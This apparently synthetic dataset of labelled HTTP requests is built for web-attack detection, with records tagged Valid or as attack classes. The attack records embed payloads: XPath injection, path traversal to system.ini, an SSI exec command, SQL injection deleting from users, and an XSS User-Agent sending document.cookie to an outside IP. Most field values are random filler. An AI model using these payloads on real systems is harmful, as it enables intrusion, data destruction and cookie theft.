Cache-Control: 4er=dminhr
Client-ip: 35.113.99.20
Cookie: ufaaunoSn0wo=rah;hxp_Mcd6=23090263;sgs=1rz$tn ensh6e;axeeArke5Ad=icenghmKg;ahgfseoEngs7o=0
Cookie2: $Version="84"
Date: Fri, 22 Aug 08 20:08:04 GMT
ETag: W/"JftVl8GYxSRSP6hMl"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Fri, 21 Nov 08 06:18:53 GMT
If-Unmodified-Since: Sun, 19 Aug 07 23:23:59 UTC
If-Match: "gStRGvxsbRGO-IZH"
If-None-Match: *
If-Range: "a94BlaFi9D5pQ4_"
Max-Forwards: 6
MIME-Version: 9.5
Pragma: jhu=esindot
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: NTLM ZWRUNXNpbzJ0amVzc2RrT3llcmU5bFNvaXRuZVNhZU5lb3RiTWFpZ2ZidGJ0ZQ==
Range: -970304,-74
Referer: http://OVhac.gov/yeh5stmc/iooli/NntTh3s/aaw9o.exe
TE: chunked,trailers,trailers
Trailer: Accept-Charset
User-Agent: e3kHe8tCQ http://www.b8exO.biz
UA-CPU: StrongARM
UA-Disp: 6889,429,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 8.2 www.tlsshn0a.css
Transfer-Encoding: identity
Upgrade: qdiue/5.0
Warning: 056 www.f4xe1oNm.htm "ehiaia" "Mon, 17 Nov 08 12:21:14 CET"
X-Forwarded-For: 54.250.164.51
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48834
Start - Id: 33495
class: Valid
POST /oTN3Knpw/bYeflxs7xzJ/lURi/hGkARYWOcnml.tiff? HTTP/1.1
Content-Length: 10
Content-Language: 0ee,a
Content-Encoding: compress
Content-Location: http://Atiih.gov/e8tlto3.asp
Content-MD5: cnJiN09iaW12aHhuZWE0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Apr 08 18:40:29 UTC
Last-Modified: Sun, 17 Jan 10 23:23:53 UTC
Host: 175.41.150.146
Connection: close
Accept: text/xml, video/*;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.0, gzip, identity;q=0.3, identity
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 94.169.51.140
Cookie: SBed8c=2;nUal7cusTtaep=5297;hethRd=39642;telnetT6S3=9604942811
Cookie2: $Version="2"
Date: Mon, 20 Jun 05 12:58:25 GMT
ETag: W/"1KtRvNx30o9cHPx_"
Expect: cni7=Oeejtq;Ys5ts
From: dpseoI@swja2e8.gov
If-Modified-Since: Thu, 11 Mar 10 18:49:54 CET
If-Unmodified-Since: Tue, 08 Jul 08 07:00:42 GMT
If-Match: *
If-None-Match: *
If-Range: "3nc4DS-ui5_D.bqdi79"
Max-Forwards: 376
MIME-Version: 1.4
Pragma: hmeeeI='uoehao'
Proxy-Authorization: Basic b3dvYXg6ZXRkWnRscnM=
Authorization: Basic cGUxZTlyZG86ZWVGY2k=
Range: 78-36513,-6283,523-
Referer: http://www.drdeH.gov/Dsydmvsw/bBoEah.tar.gz
TE: gzip;q=0.4
Trailer: Range
User-Agent: t@_6jn http://www.6goan.fr
UA-CPU: MIPS
UA-Disp: 487,750,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 383x545
Via: FTP/0.8 www.bfsedra.gif:53131, HTTP/4.5 118.214.227.51
Transfer-Encoding: compress
Upgrade: vkwpue/6.7, pllf/6.8, See/4.6, teg/0.5
Warning: 302 www.t0ae.jpg "cwhessipntmfenker8" 
X-Forwarded-For: 51.225.57.102
X-Serial-Number: 179106
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

ou8st= ett

End - Id: 33495
Start - Id: 18617
class: Valid
GET /7..rgaF@havingN-/iSesstaonugdnaiEgAl8/bincihInm8r.php?lhkg=t&el4chmlnsomicw8=csystem%29&Unogeoen6nearls=s0-reNRpontaechobw&nlt5see7sKt=ix8aPu5&Odpefaoe7m=64766&r7t9htss=260527&sm=ma&ii=70649799&8h=a%3ESftprmryrtixterme3i&uani=8791&3qtbuhNsifsbsy=vZoIA7 HTTP/1.0
Host: www.tebia2r.ch:14295
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.9, identity, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 224.49.207.166
Cookie: 7tdtpwz3hdFl=jdGg0xPW;eldedfnbIo1tn=iA8fYjjUN;nnias=fqj0UOK3z;ollr=askeifsrfv8t]0h;tc6MZidqF=A7htpassn;rbt=Hr85snU
Cookie2: $Version="38"
Date: Sun, 12 Aug 07 06:11:21 UTC
ETag: "@LZVa7ZT2QWniMH"
Expect: oeeotm
From: DddWxe@lancnuyuae.it
If-Modified-Since: Mon, 06 Sep 04 15:51:47 GMT
If-Unmodified-Since: Thu, 20 Nov 08 21:45:37 UTC
If-Match: *
If-None-Match: "vvo7UrVRATxP3fzyh.dW"
If-Range: "6A5VfAQewxAj.PZo"
Max-Forwards: 40
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest username="2qmhq41"
Authorization: Vreca tneo=ttcet
Range: -0
Referer: /aucpu/f7mja/8iwo/twnx/pmdtiZn.php3
TE: gzip,deflate;q=0.5,chunked;q=0.3
Trailer: Max-Forwards
User-Agent: Mozilla/5.3 (compatible; Konqueror/6.3; Windows NT; badi; nNeadG)
UA-CPU: x86
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7882x967
Via: reh/8.8 0.21.111.57:58983, HTTP/7.9 73.195.133.226, FTP/0.1 5.94.74.243
Transfer-Encoding: deflate
Upgrade: ndniu/9.9, rsSssn/8.8, bry2/5.0, aEnc/1.0
Warning: 858 www.lwelElt3.png "1bxSreEt8b" "Fri, 04 Jun 04 02:26:38 UTC"
X-Forwarded-For: 72.228.20.6
X-Serial-Number: 41593026
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 18617
Start - Id: 1972
class: Valid
GET /grbz6NChit/tzhcjFhey/upMgmbEue@Dm9Mt3lvu/VN/Loedta1aiiatigss.jsp?Nosce3eiWfm=iuK&ot1my=oergas&nuek=k+rcpAerhform5ehru%24n-rd&e0y5=oiixOtoio8e0lrkc&UGFbPtZmws=he%24+nyrtlh+ymochaew&lryeIea=Saleniamewineh7&sxifnlornttqciL=3328 HTTP/1.0
Host: 170.78.77.117
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: lto-t, u-tnm;q=0.6, 7zp6aj5-4oavth, cms4cYsx-wn
Cache-Control: only-if-cached
Client-ip: 200.2.254.145
Cookie: mcbconnectuvoR=ho1Deedh71;de=6SrgCe6CK6vL;le=vbscript-ebrr]anghe/aaf;LKdiy=b;qSnndeWwcml=8341;she0awt8sm4tb=2949342
Cookie2: $Version="57"
Date: Fri, 20 Feb 09 02:52:13 UTC
ETag: "C@PWa3qZSylm.3Y"
Expect: 100-continue
From: ntlbbxru@destaueare.gov
If-Modified-Since: Tue, 17 Jul 07 12:18:09 GMT
If-Unmodified-Since: Wed, 02 Dec 09 22:22:12 UTC
If-Match: "Cxi0s8mN7N-j5Tl"
If-None-Match: "Rn0iz3z5hJaP88-"
If-Range: Mon, 27 Oct 08 06:50:31 GMT
Max-Forwards: 7736
MIME-Version: 3.2
Pragma: re2n=ltzgcr
Proxy-Authorization: wiohon Esah=2tadyd
Authorization: Digest nonce
Range: 907906-,4755-184
Referer: /RkNcRchp/iIuo/qapf2.php
TE: trailers
Trailer: Date
User-Agent: Mozilla/5.9 (Windows; U; Win98 0.5; d3-ya; rv:5.5.9) Gecko/64399932
UA-CPU: MIPS
UA-Disp: 348,029,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 396x457
Via: 3.5 www.sawFsea.tiff
Transfer-Encoding: deflate
Upgrade: uhe/2.1, fhfev3/6.7, nebdfl/5.2
Warning: 739 www.4orhb5e1.shtml "oesmfaarosEeo" "Tue, 28 Dec 04 23:39:24 UTC"
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 189729230
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1972
Start - Id: 48632
class: XPathInjection
PUT /gd9GtmTs/rEtsdlt/ruwa/mmty0Az4i/u7oj4jpt/wNYbmcu_5.htm? HTTP/1.0
Content-Length: 220
Content-Language: soa4jtr,d9io
Content-Encoding: identity
Content-Location: /mebatqt/crecre/a8tc/ertm/e6kG.mdb
Content-MD5: aHlhczV0MGV0dXROcm1sYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 02 Apr 05 16:31:26 CET
Last-Modified: Mon, 20 Oct 08 06:30:32 UTC
Host: www.nttsu.ch
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=87729
Client-ip: 212.18.180.154
Cookie: W0Hh=/C>
Cookie2: $Version="46"
Date: Sat, 07 Nov 09 03:13:30 UTC
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: nIa1=ttl7lssu;IeiaDaia
From: wsnewerh@atausf.it
If-Modified-Since: Sat, 31 Jul 04 01:27:04 CET
If-Unmodified-Since: Fri, 03 Dec 04 20:10:26 CET
If-Match: *
If-None-Match: "ETknoUyrhJSSRp0c"
If-Range: Thu, 08 Dec 05 02:29:33 CET
Max-Forwards: 19
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM NzFFaHNycmUzNURzZGRydElFaFNuc2Rlb3Jzc3RlM2FvNWlleWxTbGJpRFZ0ZA==
Authorization: o7nna ieOndjT=wilMar2e
Range: -046912,8351-4,007308-22
Referer: http://www.neRrpse.be/o6one/hetqin/a1dsah.nsf
TE: deflate;q=0.7,trailers
Trailer: Range
User-Agent: Mozilla/8.7 (Windows; U; Win 9x 1.9; iB-pw; rv:1.9.9) Gecko/27701606
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: HTTP/3.1 66.162.17.172
Transfer-Encoding: gzip
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 98968
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5mmsc8e=nnar'   or   (i < count(weea/child::text())  and   j <     count(8e/child::comment())   and k  <     count(sqss/child::*) ) or    '2e'    = '   lGi'  or

End - Id: 48632
Start - Id: 9275
class: Valid
GET /i7OiLefthpcqtonbD1o/hrwDe5sseh9eiCaTen/FqG1PN@pGV.js? HTTP/1.1
Host: 171.254.22.33
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-8;q=0.8, windows-1257
Accept-Encoding: 
Accept-Language: ebieqi-oaqsaom;q=0.7, e-7occ6
Cache-Control: only-if-cached
Client-ip: 250.172.231.250
Cookie: enSgs=RuosiiframehbnFn)a0d: rps;r6c1=9301640;eytops2rtro=nc0eadmindisn9f;dses=sEenHtfpRhfhtkafbo;7H8PT=reiI)tehH%e
Cookie2: $Version="84"
Date: Sun, 15 May 05 18:12:08 GMT
ETag: "w.Mt6Okd.XPkWt4Oq"
Expect: vt4hih9=nniom4e
From: pshnnba@ycsiL.net
If-Modified-Since: Fri, 01 Apr 05 14:29:12 CET
If-Unmodified-Since: Sun, 11 Nov 07 02:02:38 GMT
If-Match: *
If-None-Match: "c_PXsUiOmT03btMm"
If-Range: Sat, 31 Mar 07 06:14:07 CET
Max-Forwards: 0704
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic c2FvdDp0bU55bGt0
Authorization: hjen 4uvssb=istisekh
Range: 39-95,-16552
Referer: http://nioo.uk/tsdeaex/tjnniudY/erpot/l65rTe.cfm
TE: trailers,gzip
Trailer: Expect
User-Agent: a2aedar8nn (oUBJnG)
UA-CPU: 68000
UA-Disp: 8991,9387,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 3482x4445
Via: 0.8 www.Pisepqe.jpg:31, 2.8 www.yEiNMo.htm
Transfer-Encoding: aT5sTp
Upgrade: Hlx/8.3, dntea/2.1
Warning: 290 110.110.36.21 "oon7Ni" 
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9275
Start - Id: 45720
class: PathTransversal
GET /yA9L0uCKfF-ZB18A3W/mWUiHADLFQ8hLHVG9/7jeqvTm1ApNi3UE6.cgi?atoisdp=%27%24e+%5Ca%3Col%3C%27%3B&uotsbBua6Bdec=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&s65b=hJbKsvE&At=19617845&ieedHow0ozoYt=at4n HTTP/1.0
Host: 37.2.249.107:80
Connection: close
Accept: text/html, application/*;q=0.4, text/*;q=0.5
Accept-Charset: iso-8859-15, x-mac-ce;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 213.38.176.90
Cookie: hyie1eo8leaOepu=612368;.6Vp1rSP4itH=epi\koouth
Cookie2: $Version="66"
Date: Tue, 21 Dec 04 13:34:16 UTC
ETag: W/"skf@5ex@3kGAQzU0"
Expect: E8io1m=9m68xA;ctn5kTae=znnvtbd
From: reani1tb@daeireeubl.de
If-Modified-Since: Sun, 29 Aug 04 15:07:38 CET
If-Unmodified-Since: Sun, 29 Jan 06 21:04:03 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 29 May 04 22:57:34 GMT
Max-Forwards: 96
MIME-Version: 2.1
Pragma: nr=E
Proxy-Authorization: Basic dGlvb2VyOmVleXQwbnBQ
Authorization: Digest username="eelt9"
Range: -500252,934-3694
Referer: http://beahrlt.be/uoee/mRntein/iTniEo/paoyVe.tar.gz
TE: gzip;q=0.1,chunked;q=0.7
Trailer: Cache-Control
User-Agent: Mozilla/0.3 (Machintosh; U; Mac OS X 9.7; eg-wo; rv:2.4.5) Gecko/87328729
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x7308
Via: FTP/5.1 www.IEbcnloh.tiff, 3.7 www.s6di.jpeg, 8.6 33.206.197.118
Transfer-Encoding: deflate
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 159.195.9.102
X-Serial-Number: 1618317
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45720
Start - Id: 40127
class: SSI
GET /aT6r_77p8Z1B/ap6rhdosaxtr/eYrNTE/m7/e3GyRgSjY.uK/hrme6tnneOn9trnhtd/o5Sawretiytd/kAIim1qP749zKeXZeh/E33GBEGuG.dll?ZJemJ@y=09022741&gWO92V=2015624&wcteeLrp=t%26&naklansafn=seermjneprocessing-instructionn&rgbdWmrvc=%3C%21++++%23%3C%21--++++%23exec+++++cmd%3D%22id%22--%3E HTTP/1.0
Host: www.4oet.st
Connection: Opbt
Accept: application/*;q=0.2
Accept-Charset: iso-8859-3, x-mac-cyrillic, x-mac-japanese;q=0.9, utf-7;q=0.8
Accept-Encoding: gzip;q=0.6
Cache-Control: no-transform
Client-ip: 66.145.232.9
Date: Mon, 29 Sep 08 16:38:27 UTC
If-Unmodified-Since: Thu, 15 Mar 07 10:29:06 UTC
MIME-Version: 6.1
Pragma: 3aunhes='iaprt6'
Authorization: 51Ar 5shchs=xydnaakN
Referer: /ehnLmt/Alahasc/2irmy3e.mp3
User-Agent: Mozilla/1.6 (compatible; Konqueror/8.8; Win98; rekaFax)
UA-Color: color32
Warning: 305 53.141.60.13 "ymreiTeeg1dos2e" "Sun, 14 Oct 07 07:03:33 CET"

null

End - Id: 40127
Start - Id: 42229
class: SqlInjection
GET /xK6autoexec9.P2div8y6v/tyhAjQs/tGDu9A5YmB-aM/vfpud2eY0yvnlbmwue1u/siQK.png?aTa=40&Tsi=70&eoeotEtt=cIcW&9desm=peelt8rr&hsarh0saeduiw=%3Caw&rr=5354276683&cOoso=imoofnsfnari0u&abrOMO_BO=3Ed3kt1&aesseRehuioaDz=8+&o58taBexyasrS=neobx%3CEim8rhaving&anlnY=dencha%27++%29%3B+++++DEL%2F**%2FETE+FROM++users+++++WHERE++++upper%28username%29++%3D++upper%28+++%27admin&y1letdohotfne=a-m%2BH3a HTTP/1.1
Host: 100.226.170.141
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 113.18.47.101
Cookie: nwxthhped32=918412034;wa41.Zzy5_K=992411;XE0b=86884;ruee=E'eCe
Cookie2: $Version="303"
Date: Mon, 08 Aug 05 24:11:17 CET
ETag: W/"sIriMAl4WPniCIC"
Expect: 100-continue
From: 6bttom@2kOpyg.org
If-Modified-Since: Fri, 10 Feb 06 01:18:16 UTC
If-Unmodified-Since: Sat, 03 Mar 07 10:48:30 CET
If-Match: *
If-None-Match: "UlE8z_q4FyB7iV_Zfc"
If-Range: "pv@qrWadt1tIHUizA"
Max-Forwards: 98
MIME-Version: 1.3
Pragma: e5uadr='wrOdqe'
Proxy-Authorization: liebx YIod=sa9l
Authorization: Digest nonce
Range: 4539-14148,-19,934-
Referer: /tNa2euw.fgf
TE: chunked;q=0.5
Trailer: If-Range
User-Agent: Mozilla/4.0 (Windows; U; Win 9x 5.6; nt-fb; rv:5.2.6) Gecko/22735376
UA-CPU: x86
UA-Disp: 4436,548,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 451x3766
Via: eotna/9.4 241.246.236.121
Transfer-Encoding: eiqbe; sAwm=flea0w9
Upgrade: haadce/5.9, cssnn/7.7
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 3.212.183.96
X-Serial-Number: 8756384538065662
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42229
Start - Id: 12440
class: Valid
GET /x1wasnsOaeuoa/26processing-instructionaxyIk0Jz.pl?Ce2nalpaess=twindow.openlae&KIEO=gn+e1tidaeaio%3Eca%3Bgo&kFMpKeLmXR8p=vdt&wdtnish53l=941872&oyxzhae4IErfeet=941847761&elj=lpositionpao7top&ho=wgeti%7E&O1q7winntLR8D=eebetweenge+u&lhsLrEeu=h0iota56r43tNJTm&eewhnelEn1=smHrzo97RWCI&sbnziiRyufRon=nKneSpmk9&Ag=aeaEm HTTP/1.0
Host: 225.116.37.197:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: Hu-dsrtn, Pee5io-ypf8, c-ze;q=0.9
Cache-Control: shorr3ih=tww
Client-ip: 102.157.155.103
Cookie: e4Rslae=Tvchildf;ArFZr=mX<shHsYinaeupdatee;.bHiobjecthokzCc=77639081;zAnjwjpUrw=ncbetweenrwgetnetcatins;Dx.rd4n6tetc=too
Cookie2: $Version="889"
Date: Sun, 26 Jun 05 09:33:11 GMT
ETag: "wSYWjdO@cP2Pcxt"
Expect: 100-continue
From: ompe9oqw@bxFairQ0sb.ch
If-Modified-Since: Sat, 14 May 05 01:48:57 CET
If-Unmodified-Since: Sat, 25 Jun 05 06:10:24 GMT
If-Match: *
If-None-Match: "SNT6G8eTKDXsD7i"
If-Range: Fri, 05 Mar 10 15:29:18 UTC
Max-Forwards: 85
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=oriedh
Range: 4-920133,-474
Referer: http://3ahl.gov/ru6rtrdU/eIrhst/uAgW.pl
TE: chunked
Trailer: Range
User-Agent: Ed6tpntalswsh
UA-CPU: MIPS
UA-Disp: 0802,3445,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 357x295
Via: 9.2 210.127.14.252:71, 6.2 215.79.113.7
Transfer-Encoding: deflate
Upgrade: tr4lel/5.2, ksu/0.2, tshCrh/6.9
Warning: 342 www.7riin7e.css "bswei9il" "Fri, 24 Jun 05 02:30:17 GMT"
X-Forwarded-For: 152.48.145.101
X-Serial-Number: 31499732572792
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12440
Start - Id: 6076
class: Valid
PUT /ouemrSueo/y_aJLdelete.cfm? HTTP/1.1
Content-Length: 118
Content-Language: e
Content-Encoding: compress
Content-Location: http://ihgtt.net/tnoUe/e4sT3asr/o9nw/agtuh/hhee1ol.swf
Content-MD5: ZHRyZ2FhYWVkY3N1VGlsaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Oct 07 01:43:05 CET
Last-Modified: Fri, 11 Jun 04 01:11:03 CET
Host: 56.91.231.232:80
Connection: dleepE8
Accept: */*;q=0.9
Accept-Charset: x-mac-cyrillic
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 59.53.26.182
Cookie: t5vomscreb=a0aA27Bihsfd;AleeD=xA6ax5KN-a;Fiteo_yftpwqq= imaSnaTst1wA~l;vAseayoity8se5h=7ioehzoesdtaaoen;5qvtU8TSconnectpL=46;g3antt2lehc9=61455
Cookie2: $Version="498"
Date: Sat, 15 Sep 07 05:42:14 UTC
ETag: W/"NE3aUauoXGYsn5j1u"
Expect: dr6lr=23tXe
From: lhr3tet@wip6gnt6b.it
If-Modified-Since: Thu, 22 Mar 07 02:11:11 CET
If-Unmodified-Since: Tue, 21 Feb 06 15:35:02 UTC
If-Match: *
If-None-Match: ".mL8NbxbMPWpdwUVM7Iw"
If-Range: Thu, 02 Mar 06 17:22:15 CET
Max-Forwards: 777
MIME-Version: 0.8
Pragma: ieltupim=nduS
Proxy-Authorization: Digest uri=/kgj1ehet/pnldts/rwlseod/iTpt6ia/uotey0if.php
Authorization: NTLM c2k2ZXRvaTBzc3R0dWZzaWh3ZXkwOXJldERuc2ZpdDU5dG00MmV1b2FpWQ==
Range: 8100-26
Referer: /aealerlr/ctot.jsp
TE: deflate,deflate;q=0.4,chunked
Trailer: If-Unmodified-Since
User-Agent: oeBRZ5N78Q http://www.Asn2.com
UA-CPU: x86
UA-Disp: 381,9388,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 179x0676
Via: FTP/5.5 93.24.11.202
Transfer-Encoding: deflate
Upgrade: asOo/3.7, xilcsc/2.8, h8r/6.5, llsa/6.6
Warning: 872 4.222.14.84:89 "ieaaIaa" "Tue, 06 Dec 05 18:11:53 GMT"
X-Forwarded-For: 65.50.7.154
X-Serial-Number: 172658995199339
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aTL3pswindow.openj=dly8S&m6Qediehnd6inh=rbeai&LbTh=nuhec/ teei&m8Nggnea0=mfoCaiybrlt&nf69stkhnporiR=c)o&nanctt8a=u

End - Id: 6076
Start - Id: 46597
class: XSS
GET /tteeai/7sbW4.g/ouauwwlri1yeusnht.jpeg?awohea=ioy&rioreetriCUa=oy&9mAS1rcpaS=r&8mwwUhelrmhe=erAae&qwchildiframesZmezuW=uAhJ&5zH1SlWs=764&rcsaiimwrs2=autoexecEq&in=1164819&tr5aaecrj=9&tHntnaillse=Roserviceswaccess_log&tiynfnh=tn HTTP/1.0
Host: 206.119.91.107:6
Connection: keep-alive
Accept: application/*;q=0.2, video/mpeg, application/x-tar;q=0.0
Accept-Charset: x-mac-ce;q=0.8, iso-8859-5, x-mac-cyrillic
Accept-Encoding: compress, deflate;q=0.5, compress;q=0.2, identity;q=0.0, identity
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 85.69.51.81
Cookie: e0dasdxhqe0=n;rmxxlexecJcmdRxBBU=25;iirohu=N?
Cookie2: $Version="8"
Date: Sat, 12 Nov 05 01:45:43 UTC
ETag: "9zn7eT01akETkZC"
Expect: 100-continue
From: eoshsh@qisp7eg.org
If-Modified-Since: Wed, 07 Apr 10 24:18:11 GMT
If-Unmodified-Since: Tue, 02 Nov 04 06:04:35 GMT
If-Match: *
If-None-Match: "cclupydG1TX-Xg72Ju"
If-Range: "FJKz8uFZ9rm1590cR"
Max-Forwards: 169
MIME-Version: 8.6
Pragma: ticEt='hnuwid9n'
Proxy-Authorization: Basic b3BvdTlsOm50Y28=
Authorization: Basic bTFiYXFlaDpvbm9wa3Ruaw==
Range: -2,441595-
Referer: http://www.ai3teeea.ch/cCRszib6/8nBiIvl/ewdL.mpg
TE: trailers,gzip;q=0.9
Trailer: Accept-Language
User-Agent: <input type  =    "image  "  dynsrc    =    "    javascript: [window.open('http://97.42.226.90/to.cfm'+document.cookie);]   "  >
UA-CPU: Sparc
UA-Disp: 5748,579,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 991x9240
Via: 7.6 166.187.3.255, 2.0 83.95.171.243, h3E/3.5 201.201.141.93:2082
Transfer-Encoding: deflate
Upgrade: Sclxk9/4.9, M9s8r/4.0, 1pr/8.7, eh6/3.6, stmem/0.6
Warning: 814 www.hsOonn.js "iker" "Fri, 28 Jul 06 12:52:58 CET"
X-Forwarded-For: 64.15.142.130
X-Serial-Number: 015353495234
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46597
Start - Id: 35359
class: SqlInjection
GET /c8holuHrscok/_shutdown6kgv6allwIWWMF/s4_GX/sigT9/mjxFi/ekauftrmb2/W6i09JFOD0a.php?nnHsdi3=z%3Dhfuwi&lsoeimnw=92530&scieha=6lwgetea&slc=nueogtirAa+%5Ceal&n0sd3ttseom=3503521&em=el&tiermasitte=%27+OR++++%27NeOtziro%27+++++LIKE++++%27aze%2525&asro3w4xrm=9376&nner=Ksnmxoesdfeit&ezlrbnr=wqc9ieN%3AmeiTneps&autoexecqxtermqu1UhttpqbodyV=L8eloao4t&9sgf0hse4Oo=4281&sdnaneroeY3e=ougiewi7ui&Eteeyptdsh=tnorEatfadmli&ryewtac=806074 HTTP/1.0
Host: www.dht0gt.cz
Connection: n0hoedhi
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 254.147.83.204
Cookie: 3woNlejepd=llurs;Hfnna8ee=j;rhy
Cookie2: $Version="194"
Date: Wed, 02 Feb 05 14:48:22 UTC
ETag: W/"7KzDRrOZR0LNGoB"
Expect: 100-continue
From: ruin@msg0oh.fr
If-Modified-Since: Sun, 04 Jul 04 02:17:10 UTC
If-Unmodified-Since: Wed, 12 May 04 19:14:04 CET
If-Match: *
If-None-Match: "ueeJa0Dl8Tb3UVx"
If-Range: Tue, 10 Jul 07 16:52:19 GMT
Max-Forwards: 937
MIME-Version: 6.8
Pragma: ot0piek='Drye'
Proxy-Authorization: NTLM VGVkNHBpZjUzc3l6dm5wZ3RtdG5kb2FoM2RuZW5vdTJhc3Rvb2ZycHNoc2g=
Authorization: tatos 8nlSpeje=8eoUwrs
Range: 56564-256483,76-,27160-85
Referer: http://oleda5.ch/k5raeve/7ovS/gohb.html
TE: trailers,chunked;q=0.5
Trailer: Host
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 9.7; Rc-EE; rv:8.3.2) Gecko/20249127
UA-CPU: 68000
UA-Disp: 3189,7325,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 739x825
Via: FTP/7.3 6.71.223.24, ehnkA/5.9 www.amip.tiff
Transfer-Encoding: gzip
Upgrade: gerh/9.6
Warning: 445 236.92.54.164 "ihposkezh6eanidatou6" "Sun, 23 Apr 06 11:05:08 UTC"
X-Forwarded-For: 4.168.32.214
X-Serial-Number: 06713
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35359
Start - Id: 1719
class: Valid
GET /3V26t_spJ/ek-p7Xu9QaSQLeK/BHin7/oslbm6sgH/fIQWn0j_4X.ZhP/ZIz/npn0YhnipneniTet/Uev/eOtVf8e68.png?tnohS=306548&qrecetoau=np_4J9ZrKT&neesBeitzadsbl=Iroda&sk6ie0t4T=bhtacces3hnc&tyoo7sdbi=s4g%40uJmF_l&8xalh=aoil1Oiin&8fomse=o%40utslohedgTtA%3C&ii=207&uuonn=7p%3Ati5udp%5B4ese HTTP/1.0
Host: 252.129.201.172:80
Connection: close
Accept: image/*;q=0.6
Accept-Charset: iso-8859-4;q=0.9, macintosh, macintosh;q=0.4, euc-cn, iso-8859-8-i
Accept-Encoding: identity, gzip, compress;q=0.8, compress;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 132.252.121.152
Cookie: rs8Et=xneilniewti;eyefo=fitr;F-Dh=a$/aeeand??arkUusr\;hriwwMn=ocM0Ox8ees(
Cookie2: $Version="689"
Date: Thu, 20 Dec 07 02:50:25 CET
ETag: "LqP66AJ3sj.doSbglm"
Expect: 100-continue
From: TIEro@eoeN.uk
If-Modified-Since: Fri, 25 Apr 08 24:33:03 CET
If-Unmodified-Since: Sun, 22 Aug 04 09:14:12 CET
If-Match: "SOe.eZo5edygQk5nz"
If-None-Match: *
If-Range: Mon, 11 Jun 07 11:28:42 GMT
Max-Forwards: 51
MIME-Version: 0.3
Pragma: no-cache
